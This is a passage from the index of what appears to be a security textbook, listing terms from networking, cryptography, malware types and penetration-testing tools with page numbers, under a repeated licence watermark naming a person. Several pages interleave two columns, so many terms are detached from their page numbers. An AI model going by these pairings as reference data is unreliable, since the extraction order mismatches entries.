Standardization (ISO), 11 IP Flow Information Export
Internet Control Message (IPFIX), 473
Protocol (ICMP), 36-37 IPS (intrusion prevention
Internet Edge, 216 system), 270
internet/guest zones, 220 IP scanners, network
internet header, 471-472 reconnaissance tools, 38
Internet Key Exchange (IKE), IPSec. see Internet Protocol
307-308 Security (IPSec)
Internet Message Access iptables, 258-259
Protocol v4 (IMAP4), 297 IP theft, 444
Internet of Things (IoT), 335-336 IPv6, impacting premise
internet protocol (IP) networks, 224
addresses, weak network IR blaster, 359
configurations, 52 IRC (internet relay chat), 87
filtering, 256 iris scan, 174
routing and switching IR sensor, 359
protocols, 219 ISACs, 27
schema, 531 ISO. see International
Internet Protocol Security (IPSec) Organization for Standardization
Authentication Header (ISO)
(AH), 305 ISOC best practice guide, data
Encapsulation Security acquisition, 490
Payload (ESP), 305 isolation-based containment,
Layer 2 Tunneling Protocol 475-476
(L2TP), 308 ISSO, 4
Security Associations (SA), IV (initialization vector), 100, 115
307-308 IV attacks, 245
transport mode, 306
tunnel mode, 306 J
internet relay chat (IRC), 87
jailbreaking, 353-354
interpreted language, Python, 392
jamming attacks, 245
intranet (private network)
JavaScript, 397
zones, 220
JavaScript Object Notation
intrusion analysis
(JSON), 421
cyber kill chain attack
jitter, 252
framework, 459-460
job rotation, 182
Diamond Model, 461
journalctl, 469
MITRE ATT&CK, 460-461
Juice Shop, 13
intrusion detection system (IDS),
jump servers, 310-311
268-269
Juniper, JunOS, 266
Index
 I-20 | Index

K ciphers, 98 Windows authentication,

Diffie-Hellman (D-H) key 154-155
KALI, network reconnaissance
agreements, 107-108 KNOX, 346
tools, 41
digital envelopes, 105-106 Kubernetes cloud orchestration
KDC (Key Distribution Center),
entropy and weak keys, platform, 430
155-156
114-115
Kerberos
authentication
ephemeral session keys, L
107-108
authentication and non- L2TP (Layer 2 Tunneling
key agreements vs. key
repudiation, 312 Protocol), 308
exchange, 107
Authentication Service, latency, 252
key Exchange, 105-106
155-156 lateral movement, pen test
Key Signing Key, 288
Key Distribution Center attack life cycle, 70
public and private key pairs,
(KDC), 155-156 lateral movement/insider
100-101, 311
secure network protocols, attack, 394
public zone signing, 287
288 layer 2 forwarding, 218
secret key, 99
Ticket Granting Service, layer 2 tunneling protocol
secure shell keys, 187
155-156 (L2TP), 308
smart cards, 164
authorization, 156-157 layer 3 forwarding, 218
symmetric cipher, 100
kernel vulnerabilities, 50 layer 4 load balancer, 249
Trusted Platform Module
Key Distribution Center (KDC), layer 7 load balancer, 249
(TPM), 164-165
155-156 layered security, 533-534
unchangeable asymmetric
key encryption key (KEK), 321 LDAP Secure (LDAPS), 288-289
private key, 318
key Exchange, 105-106 least privilege, principle, 182
USB key, 164
key exchange/agreement legacy systems
Key Signing Key, 288
algorithm, 108 platform vulnerabilities, 51
key stretching, cryptographic
keylogger, 85-86 risk management, 502
attacks, 117
key management legal department, incident
Key Usage attribute, 132
centralized key management, response (IR), 457-458
kill chain, 459
137 legal hold, 485
kill switch, 349-350
decentralized key legislation
Kismet, 244
management, 137 horizontal (consumer-
KMIP. see Key Management
devices for specific, cross-sector), 13-14
Interoperability Protocol (KMIP)
hardware security vertical (sector-specific), 13-14
knowledge-based authentication
module (HSM), 165 lessons learned phase, 457
authentication management,
smart cards, 164 lighting, site security, 541
161-162
Trusted Platform Module Lightweight Directory Access
brute force attacks, 160
(TPM), 164-165 Protocol (LDAP), 202, 288-289, 379
Challenge Handshake
USB key, 164 Linux
Authentication Protocol
escrow, 138 authentication process,
(CHAP), 158
key recovery, 138 pluggable authentication
dictionary attacks, 160
key renewal, 138 module (PAM), 155
hybrid password attacks, 160
life cycle of, 137 Bourne Again Shell (Bash)
Kerberos authentication,
M-of-N control, 138 malicious indicators, 396
155-156
see also certificate and key cat command, 278
Kerberos authorization,
management dcfldd, 493
156-157
Key Management Debian OpenSSL, 114-115
MS-CHAP, 158
Interoperability Protocol (KMIP), dig, 41
password attacks, 159-160
318-319 Dirty COW, 50, 368
Password Authentication
keys execution control, 394
Protocol (PAP), 157-158
certificate and key file integrity monitoring
password crackers, 161
management, life cycle of, 137 (FIM), 272
rainbow table attacks, 160

Index

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021

file system permissions, 200
head and tail commands, 278
ifconfig, 36
iptables, 258-259
journalctl, 469
KALI, 41
logger command, 278-279
memdump, 492
mtr, 37
Netcat, 46-47
OpenSSL
certificate and key
management, 142
certificate signing request
(CSR), 142
root certificates, 141-142
ParrotOS, 41
reverse shell, 396
root accounts, 184-185
SEAndroid, 347
Secure Erase (SE), 554
Secure Shell (SSH), 311
Security-Enhanced Linux, 347
Security Module (LSM), 394
service accounts, 186
SSH commands, 313
tcpdump, 42-43
traceroute, 37
Ubuntu
RedHat Linux container,
413-414
root accounts, 185
Volatility Framework, 492
live acquisition, 492, 493
live off the land techniques
fileless malware, 85
remote access Trojans (RATs),
86-87
load balancers
amplification attack, 247-248
application attacks, 247-248
clustering, 250-251
distributed denial of service
(DDoS), 247, 248-249
DNS amplification attack, 248
layer 4 load balancer, 249
layer 7 load balancer, 249
network appliances, 217-218
network redundancy, 518
Network Time Protocol (NTP),
247-248
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
operational technology (OT)
attacks, 248
persistence, 250
quality of service (QoS), 252
scheduling, 250
site resiliency, 532
source IP affinity, 250
local replication, 422
Local Security Authority (LSA),
Windows authentication, 154
local service accounts, 185
location services
geofencing and camera/
microphone enforcement, 351
geolocation, 350-351
GPS tagging, 352
location-based
authentication, 152
location-based policies, 193
Lockheed Martin whitepaper,
Intelligence-Driven Computer
Network Defense, 459
lockout policy, 349
log files
application log files, 470-471
authentication logs, 470
network log files, 469
system and security logs, 469
vulnerability scan outputs, 470
logger command, 278-279
logging platforms
journalctl, 469
NXlog, 469
rsylog, 468
syslog, 468
syslog-ng, 468-469
logic bombs, 89-90, 416
logic controllers for embedded
systems, 332
logic statements, 391-392, 393
logon, 150
logs
aggregation/banding
technique, 277
collection
agent-based, 276
listener/collector, 276
sensor, 276
syslog, 276
log reviews, 61-62
monitoring services, 275
Long Term Evolution (LTE), 333
Index | I-21
long term retention, 522
lookalike domains, 79
looping statements
PowerShell, 393
Python, 391-392
scripting, 390
loop prevention
Bridge Protocol Data Unit
(BPDU) Guard, 230
broadcast storm prevention,
229
Spanning Tree Protocol
(STP), 228
low observable characteristics
(LOC) attack, fileless malware, 85
LSA (Local Security Authority), 154
LTE Machine Type
Communication (LTE-M), 333
LulzSec, 20
lunchtime attacks, 77
M
MAC
address table, 228
cloning, 227
filtering, 230
flooding, 228-229
limiting, 230
network interface hardware
address, 218-219
MAC (mandatory access
control), 201
MAC (message authentication
code), 109, 113
MacAfee
data loss prevention (DLP), 450
SkyHigh Networks, 426
machine/computer
certificates, 134
machine learning (ML)
techniques, 31
macros, 396-397
macro virus, 83
“Magic Quadrant” reports, 328
magnetic hard disk, 553
mailbox access, 296
mail delivery agent (MDA), 472
Mail Exchanger (MX) record, 296
mail transfer, 296
mail transfer server, 217
mail user agent (MUA), 472
Index
 I-22 | Index
malicious code indicators
Bourne Again Shell (Bash)
malicious indicators, 396
credential dumping, 394
lateral movement/insider
attack, 394
macros, 396-397
man-in-the-browser (MitB)
attack, 397
persistence malicious
code, 395
PowerShell malicious
indicators, 395
Python malicious indicators,
396
shellcode, 394
Visual Basic for Applications
(VBA), 396-397
malicious external threats, 19
malicious internal threats, 19
malicious process, memory
resident virus, 83
malware
advance tools against, 329
guidelines for, 93
malware-based attacks
bluetooth connection
methods, 358
DLL injection, 369
domain generation algorithm
(DGA), 91
fast-flux, 91
indicators of, 90
malware classifications
adware, 85
backdoors, 86-87
cookies, 85
crypto-malware, 89
fileless malware, 84-85
keylogger, 85-86
logic bombs, 89-90
payload, 82
potentially unwanted
programs (PUPs), 82, 83
ransomware, 88-89
remote access Trojans
(RATs), 86-87
rootkits, 87-88
spyware, 85
Trojans, 82, 83
viruses, 82, 83, 83
worms, 80, 82, 84-85
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Obad Android Trojan
malware, 359
process analysis, 90-91
VM escaping, 414-415
Malware Information Sharing
Project (MISP), 27
MAM (mobile device
management), 345
Managed Google Play, 352
managed power distribution
units (PDUs), 517
Managed Security Services
Provider (MSSP), 411
management information base
(MIB), 289
management plane, 432
managerial security control, 8
mandatory access control (MAC)
authorization solutions, 201
execution control, 394
Security-Enhanced Linux, 347
mandatory vacation, 183
Mandiant’s APT1, 20
man-in-the-browser (MitB)
attack, 397
man-in-the-middle attack (MitM)
application log files, 471
certificate pinning, 140
cryptographic attacks, 116-117
DNS poisoning, 286
firmware over the air
updates, 361
high latency indicating, 37
integrity and resiliency of
data, 113
mutual authentication
preventing, 157
near field communications
(NFC), 360
unsecure protocols, 52
mantraps, 543
marketing team, incident
response (IR), 458
maximum tolerable downtime
(MTD), 508-509, 516
MDA (message digest
algorithm), 97-98
MDM. see mobile device
management (MDM)
mean time between failures
(MTBF), 510
mean time to failure (MTTF), 510
mean time to repair (MTTR), 511
mean time to respond
(MTTR), 479
measured boot, 319-320
measurement systems analysis
(MSA), 323
media sanitization, 552-553
medical devices, 338
memdump, 492
memorandum of understanding
(MOU), 323
memory leak, 368-369
memory management, 385
memory resident, viruses, 83
memory resident malware
fileless malware, 84-85
worms, 84-85
Memoryze, 492
Message Analyzer tool, 472
message authentication code
(MAC), 109, 113
message digest algorithm
(MDA), 97-98
metadata
email metadata, 471-472
file metadata, 471
mobile phone, 472
web metadata, 471
Metasploit, 45-46, 91
MFA (multifactor authentication),
151
MIB (management information
base), 289
micro segmentation, 225
microservices, 429-430
Microsoft
Active Directory (AD), 288
Always-on VPN, 308-309
App-V, 413-414
Azure
Functions, 41
Information Protection,
440, 450
SQL Database, 409
Virtual Machines, 409
Baseline Security Analyzer
(MBSA), 326
Challenge Handshake
Authentication Protocol
(CHAP), 158
Cloud App Security, 426
DNS services, 287

Edge, 470
Hyper-V, 412
Information Rights
Management (IRM), 450
Intune, 345, 346, 347, 348,
352, 357
lifecycle policy, 322
Office 365, 409, 449-450
Post Office Protocol v3
(POP3S), 297
Remote Connectivity
Analyzer, 472
Remote Desktop, 310, 413
SDL, 383
Secure Sockets Tunneling
Protocol (SSTP), 304
Security Compliance
Manager, 326
System Center Configuration
Manager (SCCM), 327
System Center products, 38
third-party risk management,
322
Visual Basic for Applications
(VBA), 396-397
Windows Server CA, 127
microwave radio connection
methods
point-to-multipoint (P2M), 362
point-to-point (P2P), 361-362
mine, logic bombs, 89
mirror port, 269-270
MISP, 27
mission essential functions
(MEF)
maximum tolerable
downtime (MTD), 508-509
recovery point objective
(RPO), 509-510
recovery time objective
(RTO), 509
risk management, 500
work recovery time (WRT), 509
mitigation controls
adversarial artificial
intelligence, 480
content filter configuration
changes, 477-478
endpoint configuration
changes
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
application allow and
block lists, 478-479
quarantine, 479
eradication and recovery, 476
firewall configuration
changes, 476-477
incident containment, 475-476
security orchestration,
automation, and response
(SOAR), 479
MitM. see man-in-the-middle
attack (MitM)
Mitre, Common Vulnerabilities
and Exposures (CVE), 30
MITRE Corporation ATT&CK
Framework, 460-461
mobile access control systems
context-aware
authentication, 349
screen lock, 349
smartphone authentication,
348-349
mobile device deployment
models
Bring Your Own Device
(BYOD), 344
Choose Your Own Device
(CYOD), 344
Corporate Owned, Business
Only (COBO), 344
Corporate Owned, Personally-
Enabled (COPE), 344
virtualization, 344
mobile device management
(MDM)
application management,
352-353
carrier unlocking, 353-354
content filter configuration
changes, 478
content management, 353
enterprise mobility
management (EMM), 345
external media, 350
full device encryption, 350
jailbreaking, 353-354
location services, 350-352
mobile access control
systems, 348-349
mobile device deployment
models, 344
Index | I-23
remote wipe/ kill switch,
349-350
rooting, 353-354
mobile payment services,
359-360
mobile phone, metadata, 472
modes of operations
Additional Data (AEAD)
mode, 109
authenticated encryption, 109
chosen ciphertext attack, 109
cipher suites, 108
cryptographic concepts, 106
digital envelopes and key
exchange, 105-106
digital signatures, 104-105
message authentication code
(MAC), 109
perfect forward secrecy,
107-108
ModSecurity, web application
firewalls, 273
modules
PowerShell, 393
Python, 392
M-of-N control, 138
moisture detection sensors, 550
monitoring services
logs, 275
network monitors, 275
packet capture, 275
motion detection alarm, 544
motivation, of threat actors, 19
MS-CHAP, 158
multi-cloud architecture, 408
multifactor authentication
(MFA), 151, 420
multifunction printers
(MFPs), 337
multimedia message service
(MMS), 360
multipartite, 83
multiparty risks, 501
multipath, disk redundancy, 519
multiple context virtual
firewalls, 265
multi-tenant cloud, 408
mutual authentication, 156-157
MX (Mail Exchanger) record, 296
Index
 I-24 | Index

N destination NAT/port network directory lists, 288-289

forwarding, 264-265 network functions virtualization
NAC. see network access control
overloaded NAT/Network (NFV), 432
(NAC)
Address Port Translation network interface card (NIC)
Namespaces, 420
(NAPT)/Port Address teaming, 518
NAPT (overloaded NAT/Network
Translation (PAT), 264 network interface hardware
Address Port Translation)/Port
static and dynamic source (MAC) address, 218-219
Address Translation (PAT), 264
NAT, 264 network layer (layer 3), 425
narrowband-IoT (NB-IoT), 333
network agents, 449 network log files, 469
NAT. see network address
network appliance platform, network mapping, 227
translation (NAT)
secure configuration guides, 12-13 network monitors, 275
NAT gateway, 423
network appliances network operating system (NOS)
National Checklist Program
domain name system (DNS), firewall, 260
(NCP), 13
217-218 network protocols. see secure
National Institute of Standards
firewalls, 217-218 network protocols
and Technology (NIST). see NIST
load balancers, 217-218 network reconnaissance tools
national laws, 14
routers, 217-218 Address Resolution Protocol
nation state actors, 21
switches, 217-218 (ARP) cache, 37
nation-state attacks, influence
wireless access points (WAP), curl, 42
campaigns, 82
217-218 dnsenum, 41
native cloud application-aware
network architecture ifconfig, 36
firewalls, 425
business workflows, 217 ipconfig, 36
NAXSI, 273
east-west traffic Nessus, 42
ND (neighbor discovery), 38
considerations, 224 netstat, 40-41
NDA (non-disclosure
IPv6, 224 Nmap Security Scanner
agreements), 182
network appliances, 217-218 IP scanners, 38
near field communications
network segmentation, service discovery, 39-40
(NFC), 359-360
219-220 nslookup/dig, 40-41
neighbor discovery (ND), 38
network segregation, 220 ping, 36-37
Nessus
network topology and zones route and traceroute, 37-38
network reconnaissance
demilitarized zone (DMZ), scanless, 41
tools, 42
221-223 theHarvester, 41
plug-ins, 59
screened hosts, 223 network redundancy
web management
zone networks, 220-224 load balancers, 518
interface, 60
routing and switching network interface card (NIC)
Netcat, testing connectivity, 46-47
protocols, 218-219 teaming, 518
Netflix, 430
weakness of, 216 switching and routing, 518
netflow/IPFIX, 473
zero trust, 224-225 networks, connectivity, route
Netskope, 427
network attached storage and traceroute, 37
netstat, network reconnaissance
(NAS), 527 network security appliances
tools, 40-41
network-based intrusion firewalls
network access control (NAC)
detection systems (NIDS), 268-269 access control lists (ACL),
hardware root of trust
network-based intrusion 262-263
(RoT), 318
prevention systems, 270 firewall implementation,
port-based NAC (PNAC),
network data acquisition, 495 259-260
231-232
network data sources network address
posture assessment, 231
bandwidth monitor, 473 translation (NAT), 263-265
unified endpoint
netflow/IPFIX, 473 open-source vs.
management (UEM), 345
protocol analyzer output, proprietary, 266
network address allocation,
472-473 packet filtering
284-285
sFlow, 473 firewalls, 256
network address translation (NAT)

Index

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Index | I-25

stateful inspection host-related intrusion nfdump/nfsen, 473

firewalls, 257-259 detection systems (HIDS), 272
virtual firewalls, 265 intrusion detection system
guidelines for implementing, (IDS), 268-269
281 intrusion prevention system
network security monitoring (IPS), 270
anomaly-based detection, mirror port, 269-270
271 network-based intrusion
behavioral-based detection systems (NIDS),
detection, 271 268-269
content filter, 272 network-based intrusion
host-related intrusion prevention systems, 270
detection systems next-generation firewalls
(HIDS), 272 (NGFW), 271-272
intrusion detection signature-based detection,
system (IDS), 268-269 270-271
intrusion prevention test access port (TAP), 269-270
system (IPS), 270 web application firewalls, 273
mirror port, 269-270 network segmentation,
network-based intrusion 219-220, 338
detection systems (NIDS), network segregation, 220
268-269 network service accounts, 186
network-based intrusion Network Time Protocol (NTP),
prevention systems, 270 247, 289
next-generation firewalls network topology and zones
(NGFW), 271-272 demilitarized zone (DMZ),
signature-based 221-223
detection, 270-271 screened hosts, 223
test access port (TAP), zone networks, 221
269-270 network traffic, 487
web application firewalls, network traffic analysis (NTA), 271
273 network vulnerability scanner
proxy servers and gateways intrusive vs. non-intrusive, 60
forward proxy servers, security assessments, 58
261-262 network vulnerability tests
reverse proxy servers, 262 (NVTs), 59
security information and New-Object, 395
event management (SIEM) New-Service, 395
analysis and report next-generation endpoint
review, 277-278 protection
file manipulation, 278-279 endpoint detection and
grep command, 279 response (EDR), 328-329
log collection, 276-277 next-generation firewall
monitoring services, 275 integration, 329
regular expression (regex) next-generation firewall
syntax, 279 integration, 329
network security monitoring next-generation firewalls
anomaly-based detection, 271 (NGFW), 271-272
behavioral-based next-generation secure web
detection, 271 gateway, 427
content filter, 272 NFC. see near field
communications (NFC)
NGFW (next-generation
firewalls), 271-272
NIDS (network-based intrusion
detection systems), 268-269
Nikto scanner, 59
NIST
Computer Security Incident
Handling Guide, 456-457
cybersecurity framework
(CSF), 3, 10-11
information security roles, 4
ISO 31K, 501
National Checklist Program
(NCP), 13
National Vulnerability
Database, 59
risk management framework
(RMF), 11
Risk Management
Framework (RMF), 501
Special publications, 11
Technical Guide to
Information Security Testing
and Assessment, 57
see also Special Publications
(NIST)
Nmap Security Scanner
IP scanners, 38
neighbor discovery (ND), 38
OS fingerprinting, 39-40
penetration tests, 69
port scan, 38
service and version
detection, 39-40
service discovery, 39-40
Nohl, Karsten, 321
noise detection alarm, 544
nonce, 115
non-credential scans, 61
non-disclosure agreements
(NDA)
onboarding policies, 182
organizational security
agreements, 323
personally identifiable
information (PII), 441
service level agreement
(SLA), 445
non-intrusive (passive)
vulnerability scanner, 60
non-persistent environment, 528

Index

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 I-26 | Index
non-persistent (session)
cookies, 374
non-repudiation, 2, 111-112
non-transparent proxy, 261
nonvolatile storage media, 493
normalization, string inputs, 383
NOS (network operating system)
firewall, 260
nslookup/dig, network
reconnaissance tools, 40-41
NTA (network traffic analysis), 271
NT LAN Manager (NTLM)
authentication, 154
NTLM (NT LAN Manager)
authentication, 154
NTP (Network Time Protocol),
247, 289
null pointer dereference, 368
NVTs (network vulnerability
tests), 59
NXlog, 469
O Password Algorithm (HOTP),
OASIS CTI framework, 29-30
OATH (Initiative for Open
Authentication), 168
OAuth (Open Authorization)
protocols, 205-206
Obad Android Trojan
malware, 359
obfuscation/camouflage code,
386-387
obfuscation techniques, integrity
and resiliency of data, 113
OCSP (Online Certificate Status
Protocol), 139-140
OCSP responder, 139-140
offboarding policies, 183
offline backups, 526
offline CAs, 128
offline password attacks, 159-160
offsite storage, 526
Off-the-Record (OTR), 458
OIDC (Open ID Connect), 206
O.MG cable, 321
Onboard Diagnostics (OBD-II)
module, 338
onboarding policies
asset allocation, 181
non-disclosure agreements
(NDA), 182
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
secure transmission of
credentials, 181
training/policies, 181
one-time password (OTP)
HMAC-based One-Time
Password Algorithm (HOTP),
168-169
Time-Based One-Time
Password Algorithm
(TOTP), 169
onion routing, 25
online backups, 526
online CAs, 128
Online Certificate Status
Protocol (OCSP), 139-140
online password attacks, 159
on-path attack, 227
On the Go (OTG), 360
OOB. see out-of-band (OOB)
Opal Storage Specification, 321
open authentication
HMAC-based One-Time
168-169
Initiative for Open
Authentication (OATH), 168
secure wireless
infrastructure, 239-240
Time-Based One-Time
Password Algorithm
(TOTP), 169
Open Authorization (OAuth)
protocols, 205-206
Open ID Connect (OIDC), 206
open permissions, weak host
configurations, 52
open ports and services, weak
network configurations, 52
Open Shortest Path First
(OSPF), 219
open-source firewalls, 266
open source intelligence (OSINT)
AT&T Security, 27
active reconnaissance, 69
Malware Information Sharing
Project (MISP), 27
Spamhaus, 28
theHarvester, 41
VirusTotal, 28
open-source spoofing tool
denial of service (DoS), 45
hping, 44-45
OpenSSH, 311
OpenSSL, 141
Open Stack, 409
OpenVAS scan engine, 58, 59
Open VPN, 303-304
Open Vulnerability and
Assessment Language (OVAL),
63
Open Web Application Security
Project (OWASP), 13
operational security control, 8
operational technology (OT)
attacks, 248
operational technology (OT)
network, 333
opportunistic threats, 19
Oracle Cloud, 409
Oracle Database, 409
Oracle VirtualBox, 411
orchestration, cloud service
integration, 430
order of restoration, 527-528
order of volatility, 490
organizational security
exploitation frameworks,
45-46
neighbor discovery (ND), 38
Netcat, 46-47
network reconnaissance
tools
Address Resolution
Protocol (ARP) cache, 37
curl, 42
dnsenum, 41
ifconfig, 36
ipconfig, 36
IP scanners and Nmap, 38
Nessus, 42
netstat, 40-41
nslookup/dig, 40-41
ping, 36-37
route and traceroute,
37-38
scanless, 41
service discovery and
Nmap, 39-40
theHarvester, 41
packet analysis, 43-44
packet capture, 42
 Index | I-27

packet injection and replay, P horizontal brute force

44-45 online attacks, 159
P7B format, 141
protocol analysis, 42-43 hybrid password
PAC (Protected Access
tcpdump, 42-43 attacks, 160
Credential), 243
traffic analysis, 43-44 offline password attacks,
packet analysis
organizational security 159-160
defined, 42
agreements, 323 online password
Wireshark, 43-44
OS (operating systems), 50 attacks, 159
packet capture, 275
OS-based execution control, password spraying, 159
packet filtering firewalls
393-394 plaintext/unencrypted
access control lists (ACL), 256
OSI la, 258 password attacks, 159
stateless operations, 256
OSI Layer 4 (transport layer), rainbow table attacks, 160
packet injection and replay
257-258 Password Authentication
hping, 44-45
OSI Layer 7 (application layer), 258 Protocol (PAP), 157-158
tcpreplay, 45
OSINT (Open Source Password Authentication
packet sniffer, 69
Intelligence), 27, 28, 41, 69 Protocol Key Exchange
Pacu, exploitation frameworks, 46
OSPF (Open Shortest Path (PAKE), 238-239
pagefile, 492-493
First), 219 password-based account
PAIN. see Privacy, Authentication,
OSSIM SIEM, 276 access mechanisms, 154
Integrity, Non-Repudiation
OT (operational technology) Password-Based Key
(PAIN)
attacks, 248 Derivation Function 2
PAKE (Password Authentication
OTP. see one-time password (PBKDF2), 117
Protocol Key Exchange), 238-239
(OTP) policies, 183-184, 192-193
PaloAtlo PANOS, 266
out-of-band (OOB) spraying, 159
PAM (pluggable authentication
communication, 465 vault, 162
module), 155
management, 310 patch management
PAM (privileged access
mechanisms, 170 host security solutions,
management), 202
outputting encoding, 383-384 326-327
PAP (Password Authentication
outsource code development, software vulnerabilities, 50-51
Protocol), 157-158
third-party risks, 55 zero-day vulnerability, 51
paper document destruction,
OVAL (Open Vulnerability and pathping, network
552-553
Assessment Language), 63 reconnaissance tools, 37
Parallels Workstation, 411
overflow vulnerabilities payload classifications
parameters, 390
buffer overflow, 367 ransomware, 82
ParrotOS, network
integer overflow, 368 remote access Trojans
reconnaissance tools, 41
overloaded NAT/Network (RATs), 82
passive (non-intrusive)
Address Port Translation (NAPT)/ rootkits, 82
vulnerability scanner, 60
Port Address Translation spyware, 82
passive reconnaissance, 69-70
(PAT), 264 Payment Card Industry Data
passphrase, 150
over-the-air (OTA), 361 Security Standard (PCI DSS), 14,
pass the hash (PtH) attack,
overwriting, 553 442, 504
369-370
OWASP (Open Web Application PBKDF2 (Password-Based Key
passwords
Security Project) Derivation Function 2), 117
crackers, 161
buffer overflow, 367 PCI DSS. see Payment Card
key, 162
regulations, 13 Industry Data Security Standard
manager
Software Assurance Maturity (PCI DSS)
password key, 162
Model, 383 PEAP (Protected Extensible
password vault, 162
Web Application Security Authentication Protocol), 242
password attacks
Risks, 387 PEM (Privacy-enhanced
brute force attacks, 160
ownership factor, 150 Electronic Mail), 140
dictionary attacks, 160
penetration testing
attack life cycle, 70

Index

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 I-28 | Index

attack profile physical port security and MAC PKCS (Public Key Cryptography
black box, 68 filtering Standards), 129
gray box, 68 Dynamic Host Configuration PKCS #12 format, 141
white box, 68 Protocol (DHCP) snooping, 230 PKI. see public key infrastructure
bug bounty, 68 MAC filtering, 230 (PKI)
defined, 67 MAC limiting, 230 places in the network (PIN)
exercise types, 68-69 physical security controls SAFE architecture, 216
passive and active guidelines for, 556 Wi-Fi protected setup
reconnaissance, 69-70 host/environment security (WPS), 239
rules of engagement, 67-68 data sanitization tools, plaintext, 96, 159
percent encoding, 373 553-554 platform as a service (PaaS),
performance limitations, Faraday Cages, 550 409, 410
cryptographic weaknesses, fire detection and playbook, 459, 479
113-114 suppression, 551-552 Play Protect, 347
permissions policies, 421 hot/cold aisles, 551 plenum, 551
persistence, pen test attack life HVAC, 550 pluggable authentication
cycle, 70 protected distribution, 550 module (PAM), 155
persistence malicious code, 395 secure areas, 548-549 plug-ins, 59
persistent (closed) cookies, 374 secure data destruction, PNAC. see port-based NAC
persistent storage acquisition, 493 552-553 (PNAC)
personal area networks (PANs), site security point-to-multipoint (P2M), 362
357, 358-359 alarm systems and point-to-point (P2P), 361-362
personal health information sensors, 543-544 point-to-point protocol (PPP), 304
(PHI), 441-442 barricades and entry/exit point-to-point tunneling
personal identification number points, 541 protocol (PPTP), 303
(PIN), 150, 154 cable locks, 543 policy server, 449
personally identifiable fencing, 541 polymorphic viruses, 83
information (PII), 441 gateways and locks, POP3S (Post Office Protocol
personally owned device use, 209 542-543 v3), 297
person-made disasters, 511 industrial camouflage, 541 POP3S (Secure POP), 297
personnel policies for privilege lighting, 541 port-based NAC (PNAC)
management mantraps, 543 IEEE 802.1x port-based NAC,
job rotation, 182 physical access 166
least privilege, principle of, 182 controls, 540 network access control
mandatory vacation, 183 physical attacks of smart (NAC), 231-232
separation of duties, 182 cards and USB, 543 port filtering/security, 256
pfSense reception personnel and port scan
firewall rule configuration, 258 ID badges, 546 Nmap Security Scanner, 38
Internet Key Exchange security guards and scanless, 41
(IKE), 307 cameras, 544-545 positive air pressure, 550
log parser, 277 site layout, 540-541 POST (forms mechanism), 292
Open VPN, 303-304 piggy backing, 76 post-incident activities phase, 457
PGP (Pretty Good Privacy), PIN (personal identification Post Office Protocol v3
134, 152 number), 150, 154 (POP3S), 297
pharming, 79 PIN (places in the network), post-quantum cryptographic
phishing campaigns, 77-78, 210 216, 239 technology, 120-121
physical access controls, 540 pinch point failures, 216 posture assessment, 231
physical controls, 9, 10 Ping of Death, 248 potentially unwanted programs
physical locks, 542 pinning, digital certificates, 140 (PUPs), 82, 83
physically secure cabled pivoting, pen test attack life power redundancy
network, 550 cycle, 70 batter backups, 517
dual power supplies, 517

Index

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021

generators, 518
managed power distribution
units (PDUs), 517
uninterruptible power
supplies (UPSs), 517
PowerShell
abnormal process behavior
analysis, 91
malicious indicators, 395
penetration testing, 70
script environment
cmdlets, 392-393
functions, 392-393
logic statements, 393
looping statements, 393
modules, 393
PPP (Point-to-Point Protocol), 304
PPTP (Point-to-Point Tunneling
Protocol), 303
pre-action fire suppression, 552
predictability, cryptographic
weaknesses, 115
predictive analysis, threat
intelligence sources, 31
prepending, 78-79
preservation and integrity of
evidence, 494
pre-shared key authentication,
307
pretexting, 75-76
Pretty Good Privacy (PGP),
134, 152
preventative control, 9, 10
principle of consensus (social
proof), 75
Privacy, Authentication, Integrity,
Non-Repudiation (PAIN), 2
privacy and data protection
controls. see data privacy and
protection controls
privacy and data sensitivity
concepts. see data privacy and
sensitivity concepts
privacy breaches, 443-444
privacy-enhanced electronic
mail (PEM), 140
privacy enhancing technologies,
451
privacy notices, 442
Privacy Shield, 443
privacy terms of agreement,
444-445
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
private cloud, 408
private keys
asymmetric encryption,
100-101
authentication and non-
repudiation, 111-112
confidentiality of, 112-113
digital certificates, 106
digital envelopes and key
exchange, 106-107
digital signatures, 104-105
man-in-the-middle attack
(MitM), 116
perfect forward secrecy,
107-108
public key cryptography
algorithms, 101
security of, 164
symmetric encryption, 99
unchangeable asymmetric
private key, 318
usage of, 126
private network (intranet)
zones, 220
private/personal data, 441
private subnets, 423
privilege access management, 187
privileged access management
(PAM), 202
privilege escalation
arbitrary code execution, 366
error handling, 367
horizontal privilege
escalation, 366
improper input handling, 367
pen test attack life cycle, 70
remote code execution, 366
vertical privilege escalation,
366
privilege management,
personnel policies, 182-183
PRNG. see pseudo RNG (PRNG)
process analysis, malware
indicators, 90-91
process automation systems,
334-335
production, development
environments, 400
programmatic access, 420
proprietary firewalls, 266
proprietary information, 440-441
Index | I-29
protected access credential
(PAC), 243
protected distribution system
(PDS), 550
protected extensible
authentication protocol
(PEAP), 242
protocol analysis, organizational
security, 42-43
protocol analyzer output, 472-473
Protocol ID/type, 256
protocol smuggling, 381
protocols/ports, restricting, 22
provisioning control, 401
proximity alarm, 544
proximity reader, 542
proxy servers and gateways
forward proxy servers,
261-262
reverse proxy servers, 262
pseudo-anonymization
process, 451
pseudo RNG (PRNG), 114-115
public (multi-tenant) cloud, 408
public (unclassified) data, 440
publicity, incident response plan
(IRP), 459
public key cryptography
algorithms
cryptographic concepts,
101-102
digital envelopes, 105-106
usage of, 126
Public Key Cryptography
Standards (PKCS), 129
public key infrastructure (PKI)
digital certificates, 106
guidelines for, 145
hierarchical (Intermediate
CA), 127-128
identity management
control, 180
online vs offline CAs, 128
single CA, 127
smart-card authentication, 164
trust model, 127
usage of, 126
public keys
asymmetric encryption,
100-101
authentication and non-
repudiation, 111-112, 312
Index
